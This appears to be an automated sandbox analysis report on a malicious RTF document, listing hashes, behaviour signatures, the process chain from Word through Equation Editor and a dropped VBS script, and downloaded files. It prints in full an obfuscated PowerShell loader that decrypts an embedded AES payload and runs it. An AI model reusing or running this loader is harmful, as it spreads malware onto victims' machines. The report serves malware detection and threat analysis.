Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    24-07-2024 01:26

General

  • Target

    31140a7886fc0eb5ad8c8cfa9b6f1235107c3be462509629786219fc02475c6a.rtf

  • Size

    83KB

  • MD5

    485c8b0bbaec4e72949307d766a4bfba

  • SHA1

    955c3d40f463ceb059f1443db2dacc39a6ff4fc0

  • SHA256

    31140a7886fc0eb5ad8c8cfa9b6f1235107c3be462509629786219fc02475c6a

  • SHA512

    5e881d82a71e0032e89106f8e73ea09d66b13e97139742bbfa9c317ff36ef1b48789fa8918063b55fd52643e6ef726b0a64131882ebbdccd85d690d59929833d

  • SSDEEP

    384:7miElA2F+Hn2+hVyjQvvnD/vyu1uje9pNJV0/msR4LTo96vljpYSZD:7mi8A2F+Hn1hcjUvjyu1u6/NJ2uhjpND

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\31140a7886fc0eb5ad8c8cfa9b6f1235107c3be462509629786219fc02475c6a.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1512
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1908
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:3060
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mydatinglifeissoggod.vBS"
        2⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87249095873756925133548634564426CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIZLpL9xl3Py+l8SR7slUHUevBi1kBPUVFUCXAdS1V5ry05GEIxWvXEOEv1VXBCN/6cFqtMoGP0r3wozPtH3gBxltdo0dRAPTvI+5L5jNRlmpL7WSN11Y+o37cmQECE8m5yoQaueGAvWVRkCK/PJggM1f7GsQuVUav7ecHNhuvfvbIUtomkHUSPUynPB7YxjwHb9VVASA6ynKfVj20Nfj8WQ7m2yfUEf4iX1Z2RtVRce/Tc/UOEG/UJWb/SMU7rylafB8vATtzQFPJtzBfjVsf3peHeI8xleZA8YPEScObOBTc+uNaMICEVs7R4BLmsc4l8PCLyph5Lgp++ElK7qI4jtp/RHIJuqorKpX6Z6enzP2OnM6Gdkj3oeTd6TDHXJRaUSOu4AP12kaFVPUHjF/0HzsFavMzg+Z0486QdMYNBAx5AM0K/ux8BInwP0WVlwkexz3i8PtSLHiOZjMZM0mfpBrZzyj7YNu+99FOBZSBWkgl7GF4VBexJkO7BuZQ/8KFjHyZNiHjGUzAMeLD2YOxqqb7qXZvV86/mnCaAdvTRkrdbsedMvxZLGwcdO/kFSezhOQHAxj0nTy50GK0fRfN+EouESXq0TyVPKn6RQ7NZA/tp6SscNfu0IZCTxk5yAfLRq0UUSRFHK7JDTbqfXFgnrlaDktcVcvJ7chZWsyZlaeTn8UD1NVuoPbwAo+cceAVYjSIEs/4nJQy4FeV3hup3tAK5+q1xAcHEfz5lyvj9gxOFUsAbIEtWoQq49ZMNoOe4mdm1N915TDKBfBvjhQWlKPOFU6VpIS1fjh9bD9luXJcqT3WMfXD2+rOvtqB77xcyJ5U4HPTw2wM5NXisVtECe42SWZhBCulh7qInAsksm8Uasns4sgc4u/dzWk9Pd72ZpmVeZlCQ5dmIrXeilYleXmsZPtjGXQdQXU1be07ioVuMLFRlQAYgvUZZAcqu1x2ndcER9XrnH5yo4xSvEfTYXNR7mJcPBdCf/a0OrfwlnDoNrIJVuNCW5tSSdt4dc6+HTvdpurrcwqDwVRoj1FvcEKPEZSpnqSICFzcP/VUBP5HPm+AxruprcAOd+XuLkUIu2P9E9RFLDfe/FyC6ZMBoNVfIUlre8xrGhKU8YplJh4xUKmzJWmGzQaX52PbhdD+oQK4QmH+gz31Xd26dXnY2i3pkowffE2WT0Hd1q8OtjkgmN3cEJtNHPOh+y74t++HAmn28qyqMsHrp3ZvFeLsn5CipIEWqbj085ABBwfkGiGHRoTArXWxB+KLgIqXhU9MJ5HCihOfq+K4TsBwkDBq0kGKVi7yYHM0H7cXTtl8xaeYdszb3+8UYMTd/VnYFBCIczEr8wLjI6lA+Wh4gMUfan/X7R0sMw8zDoJezuccj93Ja8+pzRDpUXE41+2rd+N+Js0A4OpwbrL2dMigMJlceKXw7S3skJXJNFR4GWUS8plXZkj+8KQAq6mLfuY81ETRclFSZ8AwZQXPZaQdPCL8cpqVBjdHDxaJGUO2W5/WV6XwBBZQBWYW14JnnGep6zNhQeAFLQFqG5brETFxYXmg7mMgkb9LdJXrFTc2W6wcp9XNvzBOgTYtHvCXLaKSJ4hp5EmpZvBWzE9CJvwVjkK4usRXyfei5Y3CB02D6OGurX9Un56ijcMiHjrmxs+O0kqc0JhxR8LJUXbao7SYEvms+CayWu2ST8GQ7smRUi0VR6bIx3AE3mSQ6HJQ5dNBANiQSmIg3deBJmWbspKm7azWwKCytzN//aoV7zQViOO/34qAvsHA7lEy/DLqHEd0w+bLgM0Lo5vCElEUh6CCXB3XJA==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2548

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GA43GQEJ\paste1[1].txt

      Filesize

      156B

      MD5

      ad6c37ef980373e9bcbd14810fad34bc

      SHA1

      9c061a1b3608b7c7f1db7cd06c8246913ee11bda

      SHA256

      ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c

      SHA512

      30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      b9233149214b597a54530ce21fdf21be

      SHA1

      64a6d7040fe557eb77aec46c3238f180250609d5

      SHA256

      df4821007852e5342abe18c5d2faecc7ecb527315b7d34ea9c6f99b17d796421

      SHA512

      a5418019dda7714113dc075ba003bb16a3821cf880777e98ce960ec928e1979bd71f0cdb040c21fd622fd24065e4d60d9e120a8a009e1fcea7f65f832b59c92a

    • C:\Users\Admin\AppData\Roaming\mydatinglifeissoggod.vBS

      Filesize

      55KB

      MD5

      3d6214efa393e9c67ecfbd8ca4bda0a7

      SHA1

      a69dd0e377d1aa762dfce07f397aee061dd688b2

      SHA256

      f884d494e7f128626fdd6e03440082058d3d65a039387ae84e83598cea1ba926

      SHA512

      94d79c6c94a910725cfbeb5f2e05c9e343471d79178457dbfa9dadf4a259e8cef75e062ad7be2a38c9156f590a89f3f0c6e192039c3aded6d847a441f5704e83

    • memory/1512-0-0x000000002F171000-0x000000002F172000-memory.dmp

      Filesize

      4KB

    • memory/1512-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1512-2-0x000000007111D000-0x0000000071128000-memory.dmp

      Filesize

      44KB

    • memory/1512-37-0x000000007111D000-0x0000000071128000-memory.dmp

      Filesize

      44KB

    • memory/1512-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB